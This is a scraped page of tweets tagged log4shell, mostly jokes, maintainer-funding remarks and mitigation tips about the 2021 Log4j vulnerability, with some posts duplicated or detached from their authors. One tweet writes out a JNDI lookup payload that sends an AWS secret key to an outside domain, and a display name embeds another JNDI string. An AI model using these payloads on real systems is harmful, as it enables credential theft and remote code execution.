Tag log4shell

Remote code exec is so 2014. Have this container escape and privilege escalation, instead

Since #Log4j you've heard how OSS vulns impact most orgs, how OSS is underfunded & we need to do more to help, but did you know OSS security has improved drastically in the last 4 years? In 2017, 35% of OSS libs used had a known flaw. In 2022 it's < 10% veracode.com/state-of-softw…

Chris Wysopal (@WeldPond)Wed, 09 Feb 2022 19:36 GMT

One More Log4j Security Hole Before the New Year via @thenewstack & @sjvn You didn't really want to go to that New Years Party anyway did you? It's time to patch vulnerable #log4j2 libraries one more time. #Security

Steven J. Vaughan-Nichols (@sjvn)Thu, 30 Dec 2021 19:10 GMT

log4j is that annoying sibling that won't stop poking you no matter how much you protest

Molly Struve 🦄 (@molly_struve)Tue, 28 Dec 2021 16:53 GMT

I never realized how lucky I was to not have to deal with log4j until I tried to make a joke about it to my boyfriend over the holidays and he looked like he was about to cry 😟

Serra Abak (@serraabak)Tue, 28 Dec 2021 16:00 GMT

the most important thing about the log4j incident is that it’s clear and incontrovertible evidence in support of whatever beliefs i already have about software development

henry 🌘 (@hdevalence)Mon, 13 Dec 2021 17:29 GMT

imagining a timeline where the log4j maintainers replied to the vuln disclosure with "ok, feel free to raise a PR"

Post details

this is *well* worth the read dev.to/yawaramin/the-…

cje (@caseyjohnellis)Thu, 23 Dec 2021 09:06 GMT

Matt "jira delenda est" Olson (@arachnocapital2)Sat, 25 Dec 2021 01:39 GMT

Ah, nice to be on holiday, at Christmas, where I can forget about what happ…

Michael Maclean (@mgdm)Sat, 25 Dec 2021 13:11 GMT

lol

Rufo (@hilare_belloc)Thu, 23 Dec 2021 21:14 GMT

Good news: Log4j is the only library you use that’s been trivially vulnerable for about a decade.

haroon meer (@haroonmeer)Mon, 20 Dec 2021 11:12 GMT

Reproduced. @ProtonMail #log4jRCE

Post details

https://twitter.com/aftergreatest/status/1470286011632525314

@ProtonMail ProtonMail is logging my email content?

削·格瓦斯 (@aftergreatest)Mon, 13 Dec 2021 07:19 GMT

ツキ🌙 (@iimtsuki)Mon, 13 Dec 2021 12:20 GMT

https://twitter.com/starbuxman/status/1471635197292466177

If the past week has taught us anything it's that people would rather depend on software they don't pay for, while complaining about it and it's maintainers (who are also not getting paid!)

Marit van Dijk (@MaritvanDijk77)Fri, 17 Dec 2021 06:03 GMT

https://twitter.com/GossiTheDog/status/1472362737682505731

There is going to be continued focus on log4j vulns for some time. It is very important to know not every new vulnerability is equal, or likely to be exploited.

Kevin Beaumont (@GossiTheDog)Sun, 19 Dec 2021 00:30 GMT

Important to know the vulnerability hype train is in full force for Log4j at the moment. A reminder that log4j is maintained by a small group of volunteers, up against multi billion dollar security industry and news media that profit from rewriting what they say to sound scary.

Kevin Beaumont (@GossiTheDog)Sun, 19 Dec 2021 00:25 GMT

the log4j “december to remember” event this year features 0% financing on tech debt 😮

Patrick Cable (@patcable)Fri, 17 Dec 2021 15:40 GMT

AWS has published a DaemonSet to help mitigate the impact of #Log4j2 CVE-2021-44228 on #Kubernetes clusters until Java applications can be patched. See more github.com/aws-samples/ku…

Nate Taber (@nctaber)Wed, 15 Dec 2021 22:13 GMT

A story in three parts 😶 #log4j

Cas van Cooten (@chvancooten)Fri, 10 Dec 2021 16:19 GMT

I don't care if #Log4J is supposed to be pronounced as Log-Forge... ...I'm still gonna pronounce it as Log-Four-Jay. Same way that Nginx is not Engine-Ex, it's En-Ginx (G pronounced like the G in gif).

Tinker (@TinkerSec)Tue, 14 Dec 2021 14:18 GMT

https://twitter.com/beka_valentine/status/1470134831262564353

but its not the log4j's responsibility to fix this in a timely fashion they didnt make any promises to any big corps about SLAs or any shit like that, and if there are **consequences** for those corps, that is FINE it might suck, but that's not the dev's responsibility

Beka Valentine (@beka_valentine)Sun, 12 Dec 2021 20:55 GMT

Just added support to LDAP Serialized Payloads in the JNDI-Exploit-Kit. This attack path works in *ANY* java version as long the classes used in the Serialized payload are in the application classpath. Do not rely on your java version being up-to-date and update your log4j ASAP!

Márcio Almeida (@marcioalm)Mon, 13 Dec 2021 11:54 GMT

To everyone astonished at how wide-spread Java usage really is: what you've just seen is just the stuff using Log4J2. ;)

Lars Rosenquist (@larsrosenquist)Sun, 12 Dec 2021 11:24 GMT

don't forget you can get those sweet environment variables ${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.mydogsbutt.com}

DilDog (@dildog)Sat, 11 Dec 2021 21:48 GMT

A whole lot of engineers worked all weekend and deserve the week off. Friendly reminder that you should give it to them.

emily freeman (@editingemily)Mon, 13 Dec 2021 06:06 GMT

Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.

Matthew Prince 🌥 (@eastdakota)Sat, 11 Dec 2021 22:47 GMT

Been thinking about the maintainers of log4j2 a ton this weekend. I'm so thankful for open source. While I get to maintain projects with support from my employer - most do this entirely with spare time Maintainers deserve our thanks (and sponsorships!) for their work 🤗🙏

Jeff Hollan (@jeffhollan)Sun, 12 Dec 2021 17:16 GMT

This Christmas we're burning Yule Log4js

Richard Westmoreland  (@RSWestmoreland)Fri, 10 Dec 2021 21:18 GMT

We don’t need everyone to upgrade log4j, just enough for herd immunity to takeover

Ricky (@rickhanlonii)Sun, 12 Dec 2021 16:55 GMT

Log4j recap - two random unpaid folk maintain the code - a random requested the vuln/feature in 2013 - major IT and security vendors rely on that code - problem was publicised by teens in Minecraft video game - scope of problem still unclear days later

Kevin Beaumont (@GossiTheDog)Sun, 12 Dec 2021 01:14 GMT

My #log4j status/tracking page is a little rough in spots, but the list of affected, claimed unaffected, and not-sure-yet products is getting the full undue diligence: techsolvency.com/story-so-far/c…

Royce Williams (@TychoTithonus)Sat, 11 Dec 2021 06:21 GMT

If you have a #Maven parent POM for your org or project, here's an enforcer rule to put into it which will ban any current of future usage of vulnerable #log4j2 versions. gist.github.com/gunnarmorling/…

Gunnar Morling 🌍 (@gunnarmorling)Sat, 11 Dec 2021 09:42 GMT

from @BlackHatEvents USA 2016: A Journey From #JNDI/LDAP Manipulation to Remote Code Execution Dream Land by @pwntester and @olekmirosh blackhat.com/docs/us-16/mat… now the exploit vector presented in 2016 is the #log4jRCE. attached slide #11 from the presentation below. :)

an0n (@an0n_r0)Sat, 11 Dec 2021 12:23 GMT

we’re calling this thing the Yule Log4j, right? cuz in the dark of winter we’ve gathered together to watch it burn?

gemily son of glóin (@themortalemily)Sat, 11 Dec 2021 18:23 GMT

This is a “vaccination” for the log4j vulnerability Given a vulnerable piece of software, it exploits the log4j vulnerability, just to install a new piece of code that prevents exploiting it in the future Ethical? github.com/Cybereason/Log…

Daniel Feldman (@d_feldman)Sat, 11 Dec 2021 16:21 GMT

Googling to learn more about the #Log4J vuln and google helpfully let me know that log(4) J is 0.602059991 joules

Edwin (@ed___wins)Fri, 10 Dec 2021 23:17 GMT

No one is paying the log4j2 maintainers!? There is a whole page on the responsibilities of a @TheASF "Project Management Committee"... AND NO ONE IS PAYING THEM? apache.org/dev/pmc.html Open Source needs to grow the hell up. Yesterday.

Post details

Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns. twitter.com/shipilev/statu…

Volkan Yazıcı (@yazicivo)Fri, 10 Dec 2021 16:55 GMT

Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile)Fri, 10 Dec 2021 22:58 GMT

Sending hugs to Log4J people. This must be an extraordinarily shitty Friday for them.

Post details

If you're running a server with #Log4J, please add the following JVM argument to your command line immediately to protect against a 0-day exploit. -Dlog4j2.formatMsgNoLookups=true lnkd.in/gHmEFJ9w #Java #Security #Infosec

Bruno Borges (@brunoborges)Fri, 10 Dec 2021 06:07 GMT

Aleksey Shipilëv (@shipilev)Fri, 10 Dec 2021 15:26 GMT

Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns.

Post details

Sending hugs to Log4J people. This must be an extraordinarily shitty Friday for them. twitter.com/brunoborges/st…

Aleksey Shipilëv (@shipilev)Fri, 10 Dec 2021 15:26 GMT

Volkan Yazıcı (@yazicivo)Fri, 10 Dec 2021 16:55 GMT